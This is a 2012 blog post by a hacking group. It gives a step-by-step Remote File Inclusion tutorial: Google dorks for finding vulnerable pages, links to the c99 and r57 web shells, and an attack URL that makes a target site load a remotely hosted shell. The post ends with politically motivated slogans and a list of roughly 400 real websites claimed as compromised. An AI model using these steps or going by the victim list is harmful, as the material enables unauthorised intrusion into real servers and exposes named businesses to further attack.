vendredi 27 janvier 2012

(RFI Attack) Remote File Inclusion Attack.

(RFI Attack) Remote File Inclusion Attack. 
  
  
Remote File Inclusion(RFI) is one of the most commonly used vulnerability's found on the web today.  This allows us(the attacker) to put a remote file on the victims server. If we our successful in performing the attack, we will then have gained access to the victims sites web server and we will be able to execute any type of command we want on it.
  
  
Firstly, i will show you how to search for the RFI vulnerability(something i failed to do in the LFI lesson =P ) 
The Remote File Inclusion vulnerability nomrally occures in sites, that have a simlar navigation to the one listed below: 
  
 www.victimsite.com/index.php?page=*whatever can be here* 
  
  
The easist way to find the vulnerability would be to use a google durk, that i provided below:: 
  
inurl:index.php?page= 
inurl:view.php?page= 
  
This will go ahead and show us pages in which "index.php?page=" or "view.php?page=" are in the URL, now the most easiest way to see if the site is vulnerable to Remote File Inclusion or not, would be to place "www.google.com" after the last  
"=" sign, like so:: 
  
 www.victimsite.com/index.php?page=www.google.com 
  
Lets say that the target website is http://www. zhcsucks.com 
So will make the url will become 
  
http://www.zhcsucks.com/index.php?page=http://www.google.com 
  
Now, that we have executed the "command" on the page, and if google shows up, thats when we known that the website is vulnerable to the RFI attack. Clearly, if google does not show up, move on to a different target site. 
  
It is now time for us to upload a shell to the sever to gain access. The easist way of doing this is by using some of the most common shells around, c99 or r57(or you can use the shell that milan millo just relesed, however for this lesson, lets stick to c99 or r57, i will be using c99 for this example though(and i do prefer it over other shells),  i have placed a link below to both c99 and r57 shells::
  
  
./c99::http://www.sh3ll.org/c99.txt? 
./r57::http://www.sh3ll.org/r57.txt? 
  
  
Now we need to upload the shell to a webhosting site, such as 110mb.com , htmlpaste.com or ripway.com. 
/* If this is a issue for any of you, let me know and i will write a guild on how to do this */ 
  
/* you maybe able to use the links to the shells above, instead of using external webhosting, however, ive always done it with external webhosting */ 
  
Now that we have it uploaded, we will now need to execute the shell on the target site to gain access. For examaple if the the URL of the shell is:: 
  
http://www.examplehosting.com/haxs/c99.txt? 
  
Then we would now have to execute the following url command as so to gain access to the victims site server(remember to ad a "?" at the end of the URL, very important that you do), it should like so:: 
  
http://www.zhcsucks.com/index.php?page=http://www.examplehosting.com/haxs/c99.txt? 
  
 Your shell should like the image below :: 
  
http://i43.tinypic.com/ej7cl5.png 
  
You have now excuted a shell on a target site.  
  
/* There is many other tricks and ways of doing RFI, however is by far the simplest and easist way, i will relase the other ways in do time :) */

405 sites Owned by ZHC

#FREE FREE KASHMIR!! 
#GO INDIA GO BACK! 

LIST: 
        1       http://www.realhost.in/                         
      2    http://logodesigncompany.in/                         
      3    http://unicoatindia.com/                         
      4    http://shivamjewelleries.com/                         
      5    http://lankamahavidyalaya.org                         
      6    http://kanix.net                         
      7    http://interactivetechnologies.net.in                         
      8    http://dayalandlohia.com                         
      9    http://aasheervaadshaadi.net                         
      10    http://aashianaa.com                         
      11    http://adroitzeal.com                         
      12    http://akarsha.com                         
      13    http://milanda.com                         
      14    http://acmevac.com                         
      15    http://amiyaco.com                         
      16    http://azmicomputers.com                         
      17    http://basantenterprise.com                         
      18    http://bfat.biz                         
      19    http://bombaybearings.com                         
      20    http://btat.net                         
      21    http://icaci.com                         
      22    http://lewauto.com                         
      23    http://reliableagro.com                         
      24    http://reliableproduct.com                         
      25    http://chinaicollege.com                         
      26    http://complysolution.com                         
      27    http://connectcompu.com                         
      28    http://creatind.com                         
      29    http://crystalfurnitech.com                         
      30    http://dcsgr.com                         
      31    http://deeprubber.com                         
      32    http://digitalmagicgoa.com                         
      33    http://dreamzkraft.com                         
      34    http://chennairentals.com/                         
      35    http://venkateshdevasthanfanaswadi.org                         
      36    http://vighnaharta.com                         
      37    http://crystalcanesugar.com                         
      38    http://designerstouchindia.com                         
      39    http://devifoam.com                         
      40    http://geministeel.com         
                 
      41    http://globe360.com                         
      42    http://gpjam.com                         
      43    http://ehingoli.com                         
      44    http://emarathwada.com                         
      45    http://eparbhani.com                         
      46    http://guardian-pune.com                         
      47    http://finixsoft.com                         
      48    http://hunter-bat.com                         
      49    http://jainexmetals.com                         
      50    http://jkjagiasi.com                         
      51    http://joselinaholiday.com                         
      52    http://ketandave.com                         
      53    http://idealin-fogging.com                         
      54    http://ifkkyokushinindia.com                         
      55    http://imatrixit.com                         
      56    http://indecindia.com                         
      57    http://foxiefine.com                         
      58    http://khushiexport.com                         
      59    http://ktecoma.com                         
      60    http://lalkapolymer.com                         
      61    http://ninetonineshop.com                         
      62    http://macawsinfotech.com                         
      63    http://magnifiquecs.com                         
      64    http://melodiouswaves.com                         
      65    http://nakshi.net                         
      66    http://microbs.net                         
      67    http://milburncherian.net                         
      68    http://mmtindia.com                         
      69    http://primecabcables.com                         
      70    http://sakaarmarketing.com                         
      71    http://spacecabcables.com                         
      72    http://captans.com                         
      73    http://designia-india.com                         
      74    http://essencesatori.com                         
      75    http://jayashreerajagopalan.com                         
      76    http://nuayurcare.com                         
      77    http://gpparsikbank.com                         
      78    http://ahmedgroup.com                         
      79    http://templeofflowers.com                         
      80    http://ahmednagarsinchan.com                         
      81    http://akshipman.com                         
      82    http://albcoaching.com                         
      83    http://bancomarine.com                         
      84    http://expresstalent.com                         
      85    http://bhargo.com                         
      86    http://cfaindia.com                         
      87    http://crdev.org                         
      88    http://farackal.org                         
      89    http://ginaindia.com                         
      90    http://indianaviators.com                         
      91    http://jssidara.org                         
      92    http://marketlink.co.in                         
      93    http://nanjammas.com                         
      94    http://outboundadventure.com                         
      95    http://pioneerbiopharma.com                         
      96    http://rcproposals.com                         
      97    http://riversideretreat.com                         
      98    http://rkmco.com                         
      99    http://rotoleaner.com                         
      100    http://sabre-india.com                         
      101    http://poetneeraj.com                         
      102    http://puttaparthyonline.com                         
      103    http://rajkumarkanojia.com                         
      104    http://ramautar.com                         
      105    http://safechemherbals.com                         
      106    http://namekeeper.biz                         
      107    http://sgsecurities.com                         
      108    http://sharacollections.com                         
      109    http://cyblur.com                         
      110    http://dvaviation.com                         
      111    http://hindustanbasicdrugs.com                         
      112    http://indianaviationnews.com                         
      113    http://shivamiron.com                         
      114    http://shivshaktiequipments.com                         
      115    http://sonilshah.com                         
      116    http://ssnguwahati.org                         
      117    http://tulipindia.net                         
      118    http://pudumjee.com                         
      119    http://clickanupam.com                         
      120    http://eximtips.com                         
      121    http://gailians.org                         
      122    http://idealsoftsolutions.com                         
      123    http://jayambica.com                         
      124    http://kachchhidabelimasala.com                         
      125    http://karishmacosmetic.com                         
      126    http://kutchbandhnicentre.com                         
      127    http://kutchdirectory.com                         
      128    http://legalaidindia.com                         
      129    http://mayons.com                         
      130    http://ozonecomputers.net                         
      131    http://psw.co.in                         
      132    http://rikoi.com                         
      133    http://sarthakmetals.com                         
      134    http://sdcexports.com                         
      135    http://shri-datta-swami.net                         
      136    http://shubhamengineers.com                         
      137    http://srimantasankaradevasangha.org                         
      138    http://suryaneuro.com                         
      139    http://threestargroups.com                         
      140    http://cityprideschool.com                         
      141    http://vch-india.com                         
      142    http://imccoindia.com                         
      143    http://prakashfabricators.com                         
      144    http://polyglov.net                         
      145    http://balroadlines.com                         
      146    http://tatariadezigns.com                         
      147    http://abccommunication.co.in                         
      148    http://coachsformula.com                         
      149    http://dj-ca.com                         
      150    http://libraexports.com                         
      151    http://triji.com                         
      152    http://rebuilt.co.in                         
      153    http://suzeraininsulators.com                         
      154    http://finasols.com                         
      155    http://vpnhyd.net                         
      156    http://bubnaorthohospital.org                         
      157    http://transerect.co.in                         
      158    http://netalter.com                         
      159    http://blplindia.com                         
      160    http://atiitya.com                         
      161    http://Indiapma.com                         
      162    http://netalter.co.in                         
      163    http://jalorejainsamaj.com                         
      164    http://kanchanappliances.com                         
      165    http://COMPASSONLINE.NET                         
      166    http://goldganesh.com                         
      167    http://kondkari.com                         
      168    http://artrizers.com                         
      169    http://yessironline.com                         
      170    http://unimarengg.com                         
      171    http://preetiglobal.com                         
      172    http://prrrealty.com                         
      173    http://SECUREMEDICALCLAIMS.COM                         
      174    http://prrrealty.com                         
      175    http://SECUREMEDICALCLAIMS.COM                         
      176    http://grambhumi.org                         
      177    http://rezlov.com                         
      178    http://cycomindia.com                         
      179    http://kalpdeep.com                         
      180    http://sago.in                         
      181    http://safeandsuremarine.com                         
      182    http://glrindia.com                         
      183    http://niloplast.com                         
      184    http://inkitchenworld.com                         
      185    http://parshvagroup.com                         
      186    http://shaantiindustries.com                         
      187    http://babydream.co.in                         
      188    http://webin.innsoln.com                         
      189    http://avaac.in                         
      190    http://netalterdemo.com                         
      191    http://moldartindia.com                         
      192    http://theeast.in                         
      193    http://fortcharaja.com                         
      194    http://foreignjobstimes.com                         
      195    http://nfplonline.com                         
      196    http://asnani.info                         
      197    http://dacasia.info                         
      198    http://ibrahimashk.com                         
      199    http://mazdaproperties.com                         
      200    http://abhimaan.in             
    1    http://rakhibaid.com                         
      2    http://Admin.cycomindia.com                         
      3    http://Reseller.cycomindia.com                         
      4    http://Cp.cycomindia.com                         
      5    http://sohargalvanizing.com                         
      6    http://sarvasevatrust.org                         
      7    http://rumanitravels.com                         
      8    http://kairaligranites.biz                         
      9    http://ipans.org                         
      10    http://greeps.com                         
      11    http://nakshdesigns.com                         
      12    http://jinkorp.in                         
      13    http://jinkorp.com                         
      14    http://walkthelineshoes.com                         
      15    http://armcandy-bags.com                         
      16    http://just-dresses.com                         
      17    http://olfactoryproducts.com                         
      18    http://princemultiplast.com                         
      19    http://visiontutorials.co.in                         
      20    http://shawntravels.co.in                         
      21    http://fusec.co.in                         
      22    http://precisionracks.net                         
      23    http://arunassam.org                         
      24    http://sealineship.com                         
      25    http://mj-india.com                         
      26    http://viscomm.co.in                         
      27    http://arjundasassociates.com                         
      28    http://rbdindia.com                         
      29    http://headhuntersworld.com                         
      30    http://firstcallindiaequity.com                         
      31    http://kvkhingoli.com                         
      32    http://lbsce.org                         
      33    http://rkcomputersindia.com                         
      34    http://globalwebhouse.com                         
      35    http://bmiindia.in                         
      36    http://kolhapurglobal.com                         
      37    http://concordtravels.in                         
      38    http://sahexports.com                         
      39    http://rkwigs.com                         
      40    http://humanhairexporter.com                         
      41    http://phoenixalloys.com                         
      42    http://conceptpharma.net                         
      43    http://cold-fusion-development.com/                         
      44    http://dotnet-software-development.com/                         
      45    http://dotnet-development-india.com                         
      46    http://java-software-development.com                         
      47    http://java-development-india.com                         
      48    http://setindia.com.mx                         
      49    http://laserfab.in                         
      50    http://adityamolecules.com                         
      51    http://markss.com                         
      52    http://iicmr.org                         
      53    http://parthspc.com                         
      54    http://shapotools.com                         
      55    http://qays.in                         
      56    http://petandvet.org                         
      57    http://internationaldiaries.co.in                         
      58    http://lemagnifiquegoa.com                         
      59    http://boltmaster.net                         
      60    http://kabsonsindia.com                         
      61    http://indiaitbootcamps.com                         
      62    http://bracoworldwide.com                         
      63    http://renewtechindia.com                         
      64    http://santoshtravels.com                         
      65    http://jksc.in                         
      66    http://sidhanath.com                         
      67    http://asmartIndia.com                         
      68    http://vindhyavasini.in                         
      69    http://rankcrafts.com                         
      70    http://wigsnhair.com                         
      71    http://sampoornaindia.org                         
      72    http://windmillholidays.in                         
      73    http://zooni.net                         
      74    http://internationaldiaries.co.in                         
      75    http://lemagnifiquegoa.com                         
      76    http://boltmaster.net                         
      77    http://kabsonsindia.com                         
      78    http://indiaitbootcamps.com                         
      79    http://bracoworldwide.com                         
      80    http://renewtechindia.com                         
      81    http://santoshtravels.com                         
      82    http://jksc.in                         
      83    http://sidhanath.com                         
      84    http://asmartIndia.com                         
      85    http://vindhyavasini.in                         
      86    http://rankcrafts.com                         
      87    http://wigsnhair.com                         
      88    http://sampoornaindia.org                         
      89    http://windmillholidays.in                         
      90    http://zooni.net                         
      91    http://seaswiftuae.com                         
      92    http://siddharth.biz                         
      93    http://sarsunalawcollege.org                         
      94    http://pratikdiesel.com                         
      95    http://firstobjectindia.com                         
      96    http://ameerubber.com                         
      97    http://commoditiesindia.net                         
      98    http://vardhamankidswear.com                         
      99    http://royalchemists.com                         
      100    http://rkdutt.com                         
      101    http://tristarengg.co.in                         
      102    http://blackberry.net.in                         
      103    http://pifaindia.com                         
      104    http://ezywealthzone.com                         
      105    http://commtelnetworks.net                         
      106    http://manishsinghmd.com                         
      107    http://kharupetiacollege.org                         
      108    http://vksindia.com                         
      109    http://perfectplantex.com/                         
      110    http://smithindustries.org/                         
      111    http://saurashtra.net/                         
      112    http://hindustanbuilders.com/                         
      113    http://ctccongregation.org/                         
      114    http://rajinfo.com/                         
      115    http://avis-design.com/                         
      116    http://bookingsystem.in/                         
      117    http://harshitlogistics.com/                         
      118    http://primecabkabel.com/                         
      119    http://dentosindia.com/                         
      120    http://corewellness.in/                         
      121    http://heredian.com/                         
      122    http://heredian.net/                         
      123    http://akrutionline.com/                         
      124    http://sahpetroleums.com/                         
      125    http://gpporbandar.org/                         
      126    http://al-sharief.com/                         
      127    http://mumbaidentistry.com/                         
      128    http://idfdevelopment.org/                         
      129    http://ritzhotelmumbai.com/                         
      130    http://gujaratpolythene.com/                         
      131    http://solasmareastern.com/                         
      132    http://aspri.org/                         
      133    http://vinspri.co.in/                         
      134    http://bestekgroup.com/                         
      135    http://uniquemedicals.com/                         
      136    http://suntexmercantile.com/                         
      137    http://designascentials.com/                         
      138    http://tswcapital.com/                         
      139    http://bankimplast.com/                         
      140    http://wisdomglobal.in/                         
      141    http://pharmatekindia.com/                         
      142    http://fatlossexclusive.com/                         
      143    http://vartsila.com/                         
      144    http://vivaaga.com/                         
      145    http://powertechcons.com/                         
      146    http://pcskolhapur.co.in/                         
      147    http://sawalicares.com/                         
      148    http://jewelworld.co.in/                         
      149    http://macawsinsys.co.in/                         
      150    http://commtelnetworks.co.in/                         
      151    http://addindiainc.com/                         
      152    http://addtalents.com/                         
      153    http://kairoscontent.com/                         
      154    http://nuva.edu.in/            Special             
      155    http://sgce.co.in/                         
      156    http://marvelindia.com/                         
      157    http://nuvaedu.com/                         
      158    http://hsdglobalfze.com/                         
      159    http://fransalians.com/                         
      160    http://winmark.co.in/                         
      161    http://chinartravels.com/                         
      162    http://novelwritingsoftwares.com/                         
      163    http://stopsnoringprograms.com/                         
      164    http://panicremedies.com/                         
      165    http://littleindiaventures.com/                         
      166    http://everesttool.com/                         
      167    http://anoopamadeshpande.com/                         
      168    http://reasoninfotech.com/                         
      169    http://fusionnindia.com/                         
      170    http://dhyeya.com/                         
      171    http://viptakapadia.com/                         
      172    http://nurturinggrounds.com/                         
      173    http://snaco.net/                         
      174    http://priyosakhi.com/                         
      175    http://insights-india.com/                         
      176    http://littlestarsdigboi.org/                         
      177    http://magicitalygoa.com/                         
      178    http://dataq.co.in/                         
      179    http://arraycom.co.in/                         
      180    http://panchal.in/                         
      181    http://dia.net.in/                         
      182    http://niranjanashram.com/                         
      183    http://kasasteam.com                         
      184    http://moderninnovations.co.in                         
      185    http://wingsinstitute.com                         
      186    http://architectrushikesh.com                         
      187    http://shankarmultimedia.com                         
      188    http://lotuswireless.com                         
      189    http://amglobal.in                         
      190    http://xpoz.in                         
      191    http://ecoplanet.in                         
      192    http://spacerite.net                         
      193    http://designinc.in                         
      194    http://craftmaster.in                         
      195    http://yrus.net                         
      196    http://impingegrafix.com                         
      197    http://premiumbrass.in                         
      198    http://pksltd.com                         
      199    http://goabirding.com                         
      200    http://morpheuswms.com